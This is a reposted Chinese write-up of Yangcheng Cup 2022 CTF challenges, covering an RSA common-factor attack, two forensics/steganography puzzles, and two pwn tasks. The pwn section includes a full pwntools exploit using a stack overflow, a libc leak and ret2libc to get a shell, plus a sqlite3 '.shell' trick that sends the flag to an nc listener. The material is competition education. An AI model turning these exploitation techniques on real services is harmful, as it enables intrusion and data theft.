羊城杯CTF 题目wp

admin 2022年9月5日21:29:55CTF专场评论42 views8907字阅读29分41秒阅读模式

本文来自“白帽子社区知识星球

更多红队题材或其他技术内容可见知识星球“红队专栏

羊城杯CTF 题目wp


01

Crypto

easyrsa

题目

from flag import flagfrom Crypto.Util.number import *
m = bytes_to_long(flag)e = 65537f = open("output.txt", "r")a = f.readlines()for i in a: n = int(i) c = pow(m, e, n) m = cprint 'c = %s' % (m)f.close()
'''c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727'''

分析

1、output文件中的数做为n参与计算,计算结果作为下次计算的c。

2、观察output文件中的数,通过计算,得到了公约数p。这样就可以分解出q。从而计算出c。


解题

import gmpy2from Crypto.Util.number import *a = 65439077968397540989065489337415940784529269429684649365065378651353483030304843439003949649543376311871845618819107350646437252980144978447924976470943930075812834237368425374578215977641265884859875440799334807607478705932175148673160353577875890074101393042506714001617338265284910381849259298772642190619b = 86843235426823545017422014398916780909062053456790256392304973548517489132984667679637386416948409930796162377844525829968317585749956057149930523547463230147376192820753802868362225137830225967953826475779047454555958271846035526319036389127587352017149417549187850782892924691511398536178090031958365483499c = 57839320383142814687522363258949714784622321678585619281948174372461045134361003939684803510572969567182690634502610963365500727981041136988638273942465134797850643121827808482673619534240872593224537996099454035648829692386918230535360101064254854063175494150147494342652670585674593236663514793256521719547d = 52668168898129361356420333177679019946307853075463961068071790653159090226904625885080236174231665178538405547828768043706515464922611051221394704678558922339886480247663138702481349098077291584992082414494275463670330534613607852999291645500391111597009868188974671249118213040057429113174377610094956993269e = 79875848044631194160351918105738804229446748736206976033243436373010695259945613104837645712048695514204494137005015770637421510392760763371639480133851920449252506525423837434811693638210458851990502785655738042348115385964604080872180121543147063180945532713593712726527002909054818485584237993215139630243f = 73100501797447180147684637554796375398455002202770022931512541062214916136294604754404667725341796896161398464327153718845280194035978972665664657052946003418121755545770123205426883869361411412259838522099085901563107814985172942977520233320215882707710717870398128412272218474014381169303848087621856187879g = 89149546555397759430343098936690138982544367561661914051499112345535238108800665531588376806546499374457634397161670140520060064963391826220177798442707381640723248034061313974522233415815795656570220902974484865176728535660627712374835329967608728216749734529761431592345816592875807318876347151421393671763h = 66449107450661172442868032153863675098235855689218695279414435182923510356012957155941548483160873271040452368644926703812707864779900715051152673705082002761445847561495295455460041902473282731259268870375921215589157288622757488879539441498396276257589120302991242300378364101246448094955634459779361686643i = 79694880331320743031437708811856697413105291652061062223857313580221562305807771003185061831752133665835648647560103986928466217390444724672894866216636981793418219455653595717274553950715056120806463449033181486699963584346517910081706586345546292894426402568226579894766693070066214488743160957135286739213j = 70521001788476157145543175674209083194325853388116385624440232036679708917857095748070597575068955423165296665429648694541353249787337464272095260410717659726012806836884799476995758902361678737968193674368688353935424186389207123637734230550266810766585903134004322848985320790788169777840924595645463787189k = 51801430118171456966246071852561156183140136541960623661080056673664466785669585092926482194691254461430866302262960624015915371927788809661387318097968209364907625599562339722700041444342116899266802018340155635959614677597708758012024981583143521259152639480003228924151971208695043251548758407218187895663l = 87310111118839703578797261862424304499548882114635944516216618095145194843718635007052242072452831460162126955481326379219639313067967998826898344673513019946299427614605216960081461930080199023399060417820769438661351988322185620598552697590115678078498754112860310272842870106790357443602405008865116282919
print(gmpy2.gcd(a,b,c,d,e,f,g,h,i,j,k,l))
e = 65537
def slov(n,c): p = 7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897 q = n//p phi = gmpy2.mul((p-1),(q-1)) d = gmpy2.invert(e,phi) m = gmpy2.powmod(c,d,n) return mtmp = []with open ('output.txt','r') as f1: for i in f1: tmp.append(i)tmp = tmp[::-1]

c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727for i in tmp: c = slov(int(i),c)print(long_to_bytes(c))

结果

7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897b'GWHT{gixkJl7SJTcpLOL9zqwo}'


02

Misc

迷失幻境

通过DiskGenius加载附件,可以看到在迷失幻境目录下有好多图片,全部提取出来。

羊城杯CTF 题目wp

发现数字命名的图片全都一样

羊城杯CTF 题目wp


在附件vmdk镜像里的回收站中发现了一些文件

羊城杯CTF 题目wp


将其提出来。

其中$RE4UUGI.jpg发现与迷失幻境目录里的哒哒哒.jpg显示的内容一样。用Stegsolve查看,发现$RE4UUGI.jpg存在隐写。

羊城杯CTF 题目wp


用010editor查看$RJ3JGVF,发现为png文件的主体部分,缺少了文件头。

羊城杯CTF 题目wp


补齐文件头,得到一张和幻境一样的图片。

使用Stegsolve查看,发现key。

羊城杯CTF 题目wp


再使用outguess分解$RE4UUGI.jpg。就可以得到flag文件了

羊城杯CTF 题目wp


羊城杯CTF 题目wp


where_is_secret

打开附件,发现一个压缩包和一个文本。

打开文本:

Naseu bybkjkl, O wt mna Wkkopwkja hl Qrkgeux Fasxtorr. Zdl Kaozbgj hksu oty fblz hhntyoxj wu tzphvq ku Nqnhbta, hgj pox Qupo geyiuna ago ixkj jhtpyhrhlw hu aak Nblyehg gntr. Nahkj pvwgu pl QBJ Vxwgr Zdbkyzhr, O jlxj ovfkkux zk ikojn fk 29.94 bpgmay-layrbtc vkocpggh jaoyrxt wz kgpphto uhc. Soxt E yxvas mna Ynyoptt wyfe, E dbrh pgbeax ekb mu yvfk pv Nqnhbta ah ha aak rpvk lyxyekxtp.aak lhlysvkj ez ZCDA@K1tz0frjo

推算为维基尼亚加密,使用在线工具爆破:

羊城杯CTF 题目wp

得到password:[email protected]

解压出来后是一张图片

羊城杯CTF 题目wp


根据官方提示,

from PIL import Imageimport math

def encode(text): str_len = len(text) width = math.ceil(str_len ** 0.5) im = Image.new("RGB", (width, width), 0x0)
x, y = 0, 0 for i in text: index = ord(i) rgb = (0, (index & 0xFF00) >> 8, index & 0xFF) im.putpixel((x, y), rgb) if x == width - 1: x = 0 y += 1 else: x += 1 return im

if __name__ == '__main__': with open("829962.txt", encoding="gbk") as f: all_text = f.read()
im = encode(all_text) im.save("out.bmp")

逆向脚本,注意各颜色通道数值的位置,得到一篇文章。

import string
from PIL import Imageimport mathfrom Crypto.Util.number import *
im = Image.open('out.bmp')width = im.size[0]r = ''for y in range(width): for x in range(width): t = im.getpixel((x,y)) m = (t[1] << 8) + t[2] r += (chr(m))print(r)for i in range(len(r)): if r[i] in string.ascii_letters + '0123456789{-_}': print(r[i], end='') else: print(' ', end='')

羊城杯CTF 题目wp

发现里面存在了一些英文字母

羊城杯CTF 题目wp


自己拼接下,得到了flag

flag{h1d3_1n_th3_p1ctur3}


03

PWN

YCBSQL-v4

拿到题目后,把sqlite3文件丢到IDA里面

1.判断环境变量

羊城杯CTF 题目wp


2.然后做了一些初始化的检查

羊城杯CTF 题目wp


然后就是一些循环看我们输入的参数,然后执行一些操作

本地运行的时候输入 .help 可以查看到命令帮助


羊城杯CTF 题目wp


可以看到下面有个 .shell 似乎可以执行命令

羊城杯CTF 题目wp


羊城杯CTF 题目wp


所以想到在 .sql 文件中输入

羊城杯CTF 题目wp


然后服务器用 nc 监听

羊城杯CTF 题目wp

可以看到flag被成功发送过来了

FakeNoOutput-v2

拿到题目后把fakeNoOutput丢到IDA

程序实现了一个简单的http解析

羊城杯CTF 题目wp


程序首先初始化,然后给s都写上0

使用fgets输入到s中,输入失败调用 response函数,并传入400


羊城杯CTF 题目wp


Responce函数就是http的相应体

羊城杯CTF 题目wp


Init函数设置缓冲区,然后给s2写上0x110个0,然后,在里面写上随机值

后面就是对相关http协议的字段对相应变量设置

羊城杯CTF 题目wp


这里如果sub_80497C4函数返回真就会进入 sub_8049E63 函数

羊城杯CTF 题目wp


羊城杯CTF 题目wp


我们看该函数的upload函数


羊城杯CTF 题目wp


这里strcpy向栈上拷贝数据,而且haystack是我们可控的,会存在栈溢出,注意strcpy的00截断

前面有个 while 循环,只要我们跳出那个循环走到下面,就可以到strcpy函数,所以我们在content 里面加一个 filename=


羊城杯CTF 题目wp


前面的content-length可以给size赋值


羊城杯CTF 题目wp


Responce 200 的地方可以传个地址进去泄露libc

from pwn import *from time import sleep
context.terminal = ['tmux','splitw','-h']context.log_level = 'debug'
# libc = ELF("./libc.so.6")sh = process('./fakeNoOutput')# sh = remote('tcp.dasc.buuoj.cn', 27898)elf = ELF('./fakeNoOutput')libc = elf.libc
ru = lambda x,drop = False : sh.recvuntil(x, drop)sn = lambda x : sh.send(x)rl = lambda : sh.recvline()sl = lambda x : sh.sendline(x)rv = lambda x : sh.recv(x)sa = lambda a,b : sh.sendafter(a,b)sla = lambda a,b : sh.sendlineafter(a,b)
strspn_got = elf.got["__libc_start_main"]res200 = 0x080496A1main_addr = 0x80492e0bss = 0x0805D3C0
payload0 = b"""get /upload headHTTP_SERVER1_token:taaaaUser-Agent:tccccCookie:tddddReferer:teeeeContent-Length:t5600rnContent:filename="""
payload0 += b'a' * 600
gdb.attach(sh, 'b *0x8049FEC')pause()
sl(payload0)
payload = b"A" * 4164 + p32(res200)payload += p32(main_addr)payload += p32(strspn_got)payload = payload.ljust((5000-18), b"B")sn(payload)res = ru("xf7")libc_start_main = u32(res[-4:])
log.info("----------------------" + hex(libc_start_main))
libcbase = libc_start_main - libc.sym["__libc_start_main"]system_libc = libcbase + libc.sym["system"]gets_libc = libcbase + libc.sym["gets"]log.info("----------------------" + hex(libcbase))log.info("----------------------" + hex(gets_libc))
sl(payload0)
payload = b"A" * 4164 + p32(gets_libc)payload += p32(0x08049539)payload += p32(bss)payload += p32(system_libc)payload += p32(0xbeefbeef)payload += p32(bss)payload = payload.ljust((5000-18), b"B")sn(payload)
sleep(5)sl("/bin/shx00")sh.interactive()

如果觉得本文不错的话,欢迎加入知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,还可以与嘉宾大佬们接触,在线答疑、互相探讨。



▼扫码关注白帽子社区公众号&加入知识星球▼


羊城杯CTF 题目wp
羊城杯CTF 题目wp

原文始发于微信公众号(白帽子社区):羊城杯CTF 题目wp

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月5日21:29:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  羊城杯CTF 题目wp http://cn-sec.com/archives/1279188.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: